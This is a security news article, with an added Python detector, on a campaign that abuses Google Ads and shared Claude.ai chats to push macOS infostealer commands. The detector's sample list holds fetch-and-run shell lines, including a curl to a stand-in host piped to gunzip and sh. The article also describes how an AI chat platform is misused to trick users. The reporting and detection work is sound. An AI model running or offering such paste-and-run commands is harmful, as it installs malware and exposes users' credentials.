Hackers Abuse Google Ads and Claude.ai Chats to Distribute Mac Malware
Attackers are leveraging Google Ads and weaponized Claude.ai shared chats to trick macOS users into executing malicious terminal commands that install infostealers.

Threat actors are actively abusing Google Ads and legitimate shared Claude.ai chat links to distribute malware to macOS users. By purchasing sponsored search results for terms like "Claude mac download," attackers redirect unsuspecting users to malicious Claude.ai shared chats that masquerade as official installation guides, often attributed to "Apple Support" (BleepingComputer).
The attack relies on social engineering: the shared chat instructs users to open the macOS Terminal and execute a provided command. This command triggers a multi-stage infection process. The initial payload is a base64-encoded shell script that fetches a secondary, gzip-compressed script. This secondary script is designed to run entirely in memory, a technique that minimizes the malware's footprint on the victim's disk and complicates detection (BleepingComputer).
The campaign exhibits sophisticated, polymorphic delivery, where the server generates a uniquely obfuscated version of the payload for every request to evade signature-based security tools. Furthermore, the malware performs victim profiling; one observed variant checks for Russian or CIS-region keyboard layouts, exiting silently if detected to avoid targeting users in those regions. Before executing the final payload, the script exfiltrates system information, including the victim's external IP address, hostname, OS version, and keyboard locale (BleepingComputer).
Once the environment is deemed suitable, the attackers gain remote code execution via osascript, the built-in macOS scripting engine. One variant identified by security researcher Berk Albayrak was observed harvesting sensitive data, including browser credentials, cookies, and contents from the macOS Keychain, before exfiltrating the information to an attacker-controlled server. Albayrak identified this specific payload as a variant of the MacSync infostealer (BleepingComputer).
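The delivery chain described above (base64 stage decoded into a shell, a fetched gzip-compressed stage executed without touching disk, then osascript) leaves a recognizable shape in process command-line telemetry. As an added example, not code from the BleepingComputer report or from the researcher cited, here is a small scoring detector run over constructed sample command lines; the indicator weights, the threshold and the sample lines are this example's own assumptions.

```python
from __future__ import annotations
import re

# Shell interpreter at the end of a pipe, optionally with an absolute path.
_SHELL = r"(?:/\S*/)?(?:ba|z|da)?sh\b"

# (indicator name, regex, weight). Weights are this example's own assumption,
# not a published rule; tune them against your environment's baseline.
INDICATORS = [
    # stage 1 from the article: a base64 blob decoded straight into a shell
    ("base64_to_shell", re.compile(r"base64\s+(?:-d|-D|--decode)\b[^|]*\|\s*" + _SHELL), 3),
    # stage 2: remote fetch, optional gunzip, executed in memory rather than from a file
    ("fetch_to_shell", re.compile(
        r"\b(?:curl|wget)\b.*\|\s*(?:(?:gunzip|zcat|gzip\s+-d)\b[^|]*\|\s*)?" + _SHELL), 3),
    # streamed decompression on its own is only weak evidence
    ("stream_decompress", re.compile(r"\|\s*(?:gunzip|zcat|gzip\s+-d)\b"), 1),
    # osascript with an inline script: common in legitimate use, suspicious alongside the above
    ("osascript_inline", re.compile(r"\bosascript\b.*\s-e\s"), 2),
]

FLAG_THRESHOLD = 3  # assumption: one strong indicator, or several weak ones together


def score_command(cmd: str) -> tuple[int, list[str]]:
    """Return (total weight, matched indicator names) for one command line."""
    hits = [name for name, rx, _ in INDICATORS if rx.search(cmd)]
    score = sum(w for name, _, w in INDICATORS if name in hits)
    return score, hits


def flag_commands(cmds, threshold: int = FLAG_THRESHOLD):
    """Return [(cmd, score, hits)] for every command line at or above threshold."""
    out = []
    for cmd in cmds:
        score, hits = score_command(cmd)
        if score >= threshold:
            out.append((cmd, score, hits))
    return out


# Constructed sample process command lines (not captured from the campaign).
SAMPLE_COMMANDS = [
    "echo PLACEHOLDER_BASE64_BLOB | base64 -d | bash",
    "curl -fsSL https://stage2.example.invalid/p | gunzip | sh",
    "osascript -e 'display notification \"backup finished\"'",
    "curl -fsSL https://example.invalid/install.sh -o install.sh",
    "brew install --cask firefox",
]

if __name__ == "__main__":
    for cmd, score, hits in flag_commands(SAMPLE_COMMANDS):
        print(f"[score {score}] {cmd}  <- {', '.join(hits)}")
```

Only the two paste-and-run lines cross the threshold; the lone osascript notification and the download-to-file curl stay below it, which is the point of scoring rather than matching any single indicator.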
As of the latest reports, multiple distinct infrastructures are being used to support this campaign, with researchers identifying different domains and payloads, such as customroofingcontractors[.]com and bernasibutuwqu2[.]com, serving the malicious scripts. While some domains associated with the campaign have already gone offline, the use of legitimate platforms like Google Ads and Claude.ai to facilitate the initial compromise remains a significant threat (BleepingComputer).
This campaign highlights a growing trend of attackers weaponizing trusted platforms and legitimate services to bypass traditional security filters. By leveraging the credibility of Google search results and the interactive nature of AI-generated chat sessions, threat actors can effectively deceive users into performing dangerous actions on their own systems. Users are advised to exercise extreme caution when following installation instructions found in search results or shared chat links, even when they appear to originate from reputable services (BleepingComputer).